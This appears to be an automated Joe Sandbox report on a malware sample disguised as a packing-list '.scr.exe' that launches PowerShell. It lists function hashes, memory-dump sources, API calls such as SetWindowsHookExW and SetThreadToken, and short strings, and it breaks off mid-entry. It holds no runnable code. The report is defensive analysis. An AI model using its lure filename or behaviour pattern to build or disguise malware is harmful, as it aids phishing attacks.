Source File: 00000000.00000002.2055409896.0000000009030000.00000040.00000800.00020000.00000000.sdmp, Offset: 09030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9030000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID: {
API String ID: 0-366298937
Opcode ID: c2b900430cec2513d41c5d3d6d44cd91a290a6526573e09c9d4a663cff6737c8
Instruction ID: cb284081c4025a42123db31602b107cc4ef09e51331f49e236b6a99f2366df7e
Opcode Fuzzy Hash: c2b900430cec2513d41c5d3d6d44cd91a290a6526573e09c9d4a663cff6737c8
Instruction Fuzzy Hash: 785135B0E00209AFDB04CFAAC881AEEBBF6BF88300F58D525D414E7255D7759A81CB50

Function 097FDB08 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

r1, xrefs: 097FDB73

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID: r1
API String ID: 0-2348964965
Opcode ID: 8df52dab1d05097cb3e949ebf90be900acf2d979ea8e268730914821246d858d
Instruction ID: cfac8842ec12000734e9efac5372f1e03fc7fbd50e60b69f05f0e28b3c9a63d8
Opcode Fuzzy Hash: 8df52dab1d05097cb3e949ebf90be900acf2d979ea8e268730914821246d858d
Instruction Fuzzy Hash: B0512671E042198FCB14CFA9C5915AEBBF2FF89304F2481AAD418AB356D7719942CFA1

Function 097FBC00 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e52eeef7ccd11fdd67f6010fc5c6efc576e5de43a760b75b0b9a21c7042e3e
Instruction ID: d7d1be06630d29f6ca2a7d3eaee85557da927425e2b9ee37b928489389095930
Opcode Fuzzy Hash: 47e52eeef7ccd11fdd67f6010fc5c6efc576e5de43a760b75b0b9a21c7042e3e
Instruction Fuzzy Hash: F4E11774E001198FDB14CFA8C5909AEBBF2FF89301F2881A9D518AB356DB31AD41CF61

Function 097FC038 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4031b40af37a52ac05bbbe5a36b760de90c29bff6c8ebed6d62c7dba656b94
Instruction ID: a8c978a1caae8b76c2263d9cfa90c07ed1a58c922f9d3b6560fd594ca5fd4731
Opcode Fuzzy Hash: 3b4031b40af37a52ac05bbbe5a36b760de90c29bff6c8ebed6d62c7dba656b94
Instruction Fuzzy Hash: 11E12875E041198FCB15CFA8C5909AEBBF2FF89305F288169E548AB356C731AD41CF61

Function 097FB7C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947edab45fd7fad27afd9f2daa842622a3d433842a751e28a3d77712f33407af
Instruction ID: bdcb65b28016e8ce1af9fc1a23ae06f868b2092dc1c0399bba521c876a6447d4
Opcode Fuzzy Hash: 947edab45fd7fad27afd9f2daa842622a3d433842a751e28a3d77712f33407af
Instruction Fuzzy Hash: 89E11674E041198FCB14CFA9C5919AEBBF2FF88305F248169D518AB356DB31AD81CFA1

Function 097FD6E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6d3bd5c745beb5131d7fd3a9da45fd66c25e5d8861d5a65fddc5ea44dff402
Instruction ID: 893016db02fc65f2238b9d415fd0a211ee558d79708262c07a71daf8764e56c3
Opcode Fuzzy Hash: 9b6d3bd5c745beb5131d7fd3a9da45fd66c25e5d8861d5a65fddc5ea44dff402
Instruction Fuzzy Hash: 8DE12774E041198FCB14CFA9C5919AEBBF2FF89305F2481A9D518AB396D731AD81CF60

Function 014FD304 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051876261.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7650d92175a9a362eb277b3ce43aab5cca122dfaf6e43856208af529b8e1e298
Instruction ID: b55a4f86a2f3e845fb7cf9def2b3dedd531c44db496e2ee9b6ad9777ede82967
Opcode Fuzzy Hash: 7650d92175a9a362eb277b3ce43aab5cca122dfaf6e43856208af529b8e1e298
Instruction Fuzzy Hash: AFA17F36E0020A8FCF15DFB5C84459EBBB2FF94300B15456EEA05AB365DB71E91ACB40

Function 097F52B0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f0eade409220274fc16e340a19c04bde5173c212ee518ce2905e3200ce167b
Instruction ID: 667faa155f9636aadbb61fe329670d7231c9373788cd3459a1b84553caae0813
Opcode Fuzzy Hash: f5f0eade409220274fc16e340a19c04bde5173c212ee518ce2905e3200ce167b
Instruction Fuzzy Hash: D7718C75E042188FDB04CFAAC5849AEFBF2BF88301F14D16AE418AB315DB30A946CB50

Function 097F52AB Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bbf618c1a2d95990c5881a34736b09d6d0e290aa165a8a2a11ab0c5ef4094c
Instruction ID: dac0b6a87fe8d662b5b72a55675555030bc88bfc75eaea61c4c0e2d5f2aaccb7
Opcode Fuzzy Hash: 92bbf618c1a2d95990c5881a34736b09d6d0e290aa165a8a2a11ab0c5ef4094c
Instruction Fuzzy Hash: AB516F75E046198FDB08DFAAC98469EFBF2BF88310F14C16AE419AB315DB349946CF50

Analysis Process: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exePID: 6592, Parent PID: 1988COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	3

Executed Functions

Function 0290CC3A Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0290CCBE
GetCurrentThread.KERNEL32 ref: 0290CCFB
GetCurrentProcess.KERNEL32 ref: 0290CD38
GetCurrentThreadId.KERNEL32 ref: 0290CD91

Memory Dump Source

Source File: 00000003.00000002.4525152458.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2900000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3498ef769690d2f43cded2ad550966cee2b0ba3869161562107106b97e86ca89
Instruction ID: 1e8d661e565d40c16a403e2437ea4c95712004733cc7304e294ad0efcffb0b55
Opcode Fuzzy Hash: 3498ef769690d2f43cded2ad550966cee2b0ba3869161562107106b97e86ca89
Instruction Fuzzy Hash: 905145B09002498FDB14DFA9D588BAEBFF5EF88304F248559E009A73A0D7789944CBA5

Function 0290CC40 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0290CCBE
GetCurrentThread.KERNEL32 ref: 0290CCFB
GetCurrentProcess.KERNEL32 ref: 0290CD38
GetCurrentThreadId.KERNEL32 ref: 0290CD91

Memory Dump Source

Source File: 00000003.00000002.4525152458.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2900000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1e0aeb5bbccc3f167feb602c09334e5cbf2208ff835ca9ddef20184f90578b9f
Instruction ID: 385fe9b48aa36f359d144e1314b89581c42fe582ae713a0c161f7c67b4322b64
Opcode Fuzzy Hash: 1e0aeb5bbccc3f167feb602c09334e5cbf2208ff835ca9ddef20184f90578b9f
Instruction Fuzzy Hash: 085157B09003498FDB14DFA9D588BAEBFF5EF48304F208559E409A73A0D7789944CFA5

Function 0290C814 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0290CE4E,?,?,?,?,?), ref: 0290CF0F

Memory Dump Source

Source File: 00000003.00000002.4525152458.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2900000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 911a4b9c763b2d46b000e6e61b012eec3507ae4ae36a5f6ef286c8d01c3290f1
Instruction ID: 3fdb6ba2ceb35ac70699d11c1e159ede1f2f64396b0a6dfe72dad3bdfbbc04ba
Opcode Fuzzy Hash: 911a4b9c763b2d46b000e6e61b012eec3507ae4ae36a5f6ef286c8d01c3290f1
Instruction Fuzzy Hash: 1E21E6B59002489FDB10CF9AD984ADEFFF9FB48310F14851AE918A3350D378A944CFA1

Function 0290CE80 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0290CE4E,?,?,?,?,?), ref: 0290CF0F

Memory Dump Source

Source File: 00000003.00000002.4525152458.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2900000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 60223a95ab314e88c95652c5f902c13eaf0b022f583cd1eae15ba8f9a6bc58bb
Instruction ID: 0d8712cbb0af0b6a040ed36b3c0686a7af733696fb96fceaef51d972fa3a999a
Opcode Fuzzy Hash: 60223a95ab314e88c95652c5f902c13eaf0b022f583cd1eae15ba8f9a6bc58bb
Instruction Fuzzy Hash: 5F21E4B5D002489FDB10CF99D984ADEBBF8FF08310F14841AE918A3350D378A944CFA1

Function 02907A28 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02907AAB

Memory Dump Source

Source File: 00000003.00000002.4525152458.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2900000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: b343137fb7872896907223dca0415ea501641b51da144f4d9068605d7d7a2aa6
Instruction ID: c44b3a82a04c59e57b8facb3e6f0578c442f2ef356072e86894aa4ef57aaff1e
Opcode Fuzzy Hash: b343137fb7872896907223dca0415ea501641b51da144f4d9068605d7d7a2aa6
Instruction Fuzzy Hash: 5C2125B5D002099FDB14DF9AD984AEEFBF5BF88320F14842AD419A7250C774A945CFA1

Function 02907A30 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02907AAB

Memory Dump Source

Source File: 00000003.00000002.4525152458.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2900000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: dbfffad7e6c2d42605ae69035491e89fef8398b0eaab4e29a7cd6ee610a60706
Instruction ID: c700dd168cf06afe1996a37bc91b83efebf1c677b9c00891472e36215f830405
Opcode Fuzzy Hash: dbfffad7e6c2d42605ae69035491e89fef8398b0eaab4e29a7cd6ee610a60706
Instruction Fuzzy Hash: 8E2115B59002099FDB14DF9AC944BEEFBF5FF88320F10842AD419A7250C774A940CFA1

Function 00FAD514 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4524345640.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fad000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42066ada003ce8aaea9b70c058c67af9d189f3e7bd3d6bec05fe76342652d0ed
Instruction ID: 750ee79b458f332d7c4ce6e92f2266ce9971f4a76865e88408a5677d313e2461
Opcode Fuzzy Hash: 42066ada003ce8aaea9b70c058c67af9d189f3e7bd3d6bec05fe76342652d0ed
Instruction Fuzzy Hash: 272128B2904240DFCB05DF14D9C0F26BF65FB99328F28C569E90A0B656C336D816E7A2

Function 00FBD0FC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4524509554.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fbd000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8332aae39dd5a3eff844224ce52e5bfb65cd451500df9501090da238cc7aac36
Instruction ID: bcb6e537c12659ddf4a599271c1133b53f335645b70cb0cc13402542c712cb06
Opcode Fuzzy Hash: 8332aae39dd5a3eff844224ce52e5bfb65cd451500df9501090da238cc7aac36
Instruction Fuzzy Hash: F3210475604204DFEB05DF28D9C0B66BFA5FB88324F24C56DD8094B296D33BD846EE62

Function 00FBD01C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4524509554.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fbd000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8f5dd309c6e71403e207ea6071ef547e7a5740e983662729d724e85d441443
Instruction ID: fc44377edce8112711e7672d3ccbf3c5513a020813a244c7154a1dd9c32ee2b3
Opcode Fuzzy Hash: 9b8f5dd309c6e71403e207ea6071ef547e7a5740e983662729d724e85d441443
Instruction Fuzzy Hash: 5921F271A04200DFDB14EF24C980B26BF65EB94364F24C56DD9094B35AD33AD846DA62

Function 00FBD005 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4524509554.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fbd000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a08fffc00f5f8f8e620d23e7e8445646a26b0240b0e98e82f4e4fb77a11f674
Instruction ID: 45fbe27924eaddb2f759385e2fb327bba6af1e0375385f32d1abfbfdda1d8ed9
Opcode Fuzzy Hash: 5a08fffc00f5f8f8e620d23e7e8445646a26b0240b0e98e82f4e4fb77a11f674
Instruction Fuzzy Hash: 83219F759093808FCB12DF24C990715BF71EB46314F28C5EAD8498B6A7C33A984ACB62

Function 00FAD50F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4524345640.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fad000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 5f9c67c29c5aa5d7069c52aed79476ec1e6aedba10650e3445b38b7596f7f9fd
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: F81129B2804280CFCB02CF04D5C4B16BF71FB94324F28C5A9D8464B656C336D456DBA1

Function 00FBD0F7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4524509554.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fbd000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 0ff0ba9cdb1abc777911b7f93c3de3584165726dd1116ae60ad8aa1cd93d4b25
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 9111D075904240CFEB06CF14D9C4B15BF71FB44324F24C6A9D8494B656C33AD84ADF62

Analysis Process: powershell.exePID: 3228, Parent PID: 6592COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 02D9B470 Relevance: .3, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faca50f29bcc1b9e6dcdb49abb93003a9a6c92b2debf24b492770ee8ad709fee
Instruction ID: 339b758187dc61a972a3ab7c83a11d759c4ef474c188b4e1356357c916db117b
Opcode Fuzzy Hash: faca50f29bcc1b9e6dcdb49abb93003a9a6c92b2debf24b492770ee8ad709fee
Instruction Fuzzy Hash: 85915B31B006545BDB19EFB485105AEBBB3EF84604B00C96DE14AAB350EF38AD06CBD6

Function 02D9B490 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae964ea9c94a146d5f04f3c2792304aba3cd980c85ceeb8918172a546904cf2c
Instruction ID: ecad1fd274fd29e5e5ba07ca0fd7a0466e5813b8d198d774535ee4e88cf409e1
Opcode Fuzzy Hash: ae964ea9c94a146d5f04f3c2792304aba3cd980c85ceeb8918172a546904cf2c
Instruction Fuzzy Hash: C9912C71F006155BDB19EFB485105AFB6A7EF84A04B00C92DE14AAB344EF386D069BD6

Function 07552308 Relevance: 14.4, Strings: 11, Instructions: 655COMMON

Download Yara Rule

Strings

JXl, xrefs: 075523D1
rWl, xrefs: 07552559
JXl, xrefs: 075525F6
rWl, xrefs: 0755254F
4']q, xrefs: 0755260D
JXl, xrefs: 075523C5
JXl, xrefs: 0755237F
JXl, xrefs: 075525EA
|,!k, xrefs: 075525DB
4']q, xrefs: 07552619
JXl, xrefs: 0755259E

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$|,!k$JXl$JXl$JXl$JXl$JXl$JXl$rWl$rWl
API String ID: 0-1009563007
Opcode ID: f3873b9897fa83aea14af0bc0c18ec0b825f65f451e9a1c4883f8d090701f3a5
Instruction ID: 29f7aa11002b08cd79e3b3091c609eda7626509c832751eb26bb9c02edc75e65
Opcode Fuzzy Hash: f3873b9897fa83aea14af0bc0c18ec0b825f65f451e9a1c4883f8d090701f3a5
Instruction Fuzzy Hash: D82247F1B002069FDB158B68C8606EABBE6FF85310F0484BBDC05DB252DB35D945CBA2

Function 07553CE8 Relevance: 5.6, Strings: 4, Instructions: 588
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 07554030
4']q, xrefs: 0755418A
4']q, xrefs: 07554026
4']q, xrefs: 07554180

Memory Dump Source

Source File: 00000004.00000002.2123754000.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7550000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: e44d0b8baf59fbf19d7e1f0aa715b5911c60179fb7e75d74e7b64e7a8b3bf112
Instruction ID: 88b68de9e2a729a9b1b985fd04a35afb8b3c9291ee432d436c84d7f3a5e03bd7
Opcode Fuzzy Hash: e44d0b8baf59fbf19d7e1f0aa715b5911c60179fb7e75d74e7b64e7a8b3bf112
Instruction Fuzzy Hash: 7C1268B17042559FCB258B6888217EABBE2AFC1354F2484BBDD05CF252DB35CD85CBA1

Function 086C6A48 Relevance: 1.6, APIs: 1, Instructions: 53
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 086C6AB2

Memory Dump Source

Source File: 00000004.00000002.2126210727.00000000086C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_86c0000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: c90b0b4cab9c12593db8c30d40d5cc6202e1e410876205dab0b7b0080b05254a
Instruction ID: 137ea25de9a9856dabb309e99cb7ff12d3e2d8e77309708620795bc91c7859c4
Opcode Fuzzy Hash: c90b0b4cab9c12593db8c30d40d5cc6202e1e410876205dab0b7b0080b05254a
Instruction Fuzzy Hash: ED1134B59002489FCB10DFAAC845B9EFFF8EF49320F14845AD118A7350C774A948CFA4

Function 086C6A50 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE ref: 086C6AB2

Memory Dump Source

Source File: 00000004.00000002.2126210727.00000000086C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_86c0000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: d804daa18d38304ceb71f04cde20bd9b8e0e9f6bc81dd23ff36fdb029cd68ed6
Instruction ID: afc1f87560ff014f3d36a2e0e9439387b00e885a98f1f21da9d916c66e2b4670
Opcode Fuzzy Hash: d804daa18d38304ceb71f04cde20bd9b8e0e9f6bc81dd23ff36fdb029cd68ed6
Instruction Fuzzy Hash: 1411F5B59006489FCB10DF9AD544BAEFFF8EF48320F14845AD519A7350C778A944CFA5

Function 02D9E5B9 Relevance: 1.4, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JXl, xrefs: 02D9E6EA

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID: JXl
API String ID: 0-1614082895
Opcode ID: bc8561c645ede83fe33bf1210f295d17fcbb733d3f04ac415160fc7994c9a9e0
Instruction ID: af46df7e6cbff3844ba1c11a92b120d42ccc422893c72bc7aac65314dc5f87b7
Opcode Fuzzy Hash: bc8561c645ede83fe33bf1210f295d17fcbb733d3f04ac415160fc7994c9a9e0
Instruction Fuzzy Hash: 5641AB30A042489FCB05DF79E954A9DBFF2EF49304F0486AED405AB361DB34AD09CB90

Function 02D96FE0 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 02D97105

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: 8c96f9cc722140a36cf8d9a7a67b437e9460bf7aca988f0417e83e0b5bcf9523
Instruction ID: a7e6a2fb62971b78578064ef0194c5d130b0ed9a281a9efd15d9c27c434c210e
Opcode Fuzzy Hash: 8c96f9cc722140a36cf8d9a7a67b437e9460bf7aca988f0417e83e0b5bcf9523
Instruction Fuzzy Hash: 37417E34B142048FEB05DF68C558AAEBBF2EF8D715F2440A9E406AB3A1DB35DC01CB61

Function 02D9E610 Relevance: 1.4, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JXl, xrefs: 02D9E6EA

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID: JXl
API String ID: 0-1614082895
Opcode ID: ecc10bf1993c2f2304ae14f9303861212fb42aa613aa05342dc03bddee452571
Instruction ID: 56161a4d30d10b1e7045416374a68f9d5f3b8635a61abbad7d90eb110516c3f2
Opcode Fuzzy Hash: ecc10bf1993c2f2304ae14f9303861212fb42aa613aa05342dc03bddee452571
Instruction Fuzzy Hash: B941B030A012459FCB06DF79D554A9EBFF2EF49204F1486ADD445AB362DB34AC09CBA1

Function 02D9E640 Relevance: 1.3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JXl, xrefs: 02D9E6EA

Memory Dump Source

Source File: 00000004.00000002.2105650860.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_powershell.jbxd

Similarity

API ID:
String ID: JXl
API String ID: 0-1614082895
Opcode ID: e27cf00718bff5c201bb4850967060eeb82e97a5fc8e6e19dd0d05f2d6e573fe
Instruction ID: 45767d0a85e11ee1868f769ba6b1fea09f83f9b59222441e0c236fb359910030
Opcode Fuzzy Hash: e27cf00718bff5c201bb4850967060eeb82e97a5fc8e6e19dd0d05f2d6e573fe
Instruction Fuzzy Hash: 0F318C30A002099FCB14DF69E594A9EBBF6FF88304F148669E416A7394DB34AD05CB91

Function 02D9AF98 Relevance: 1.3, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&]q, xrefs: 02D9AFBA

Memory Dump Source

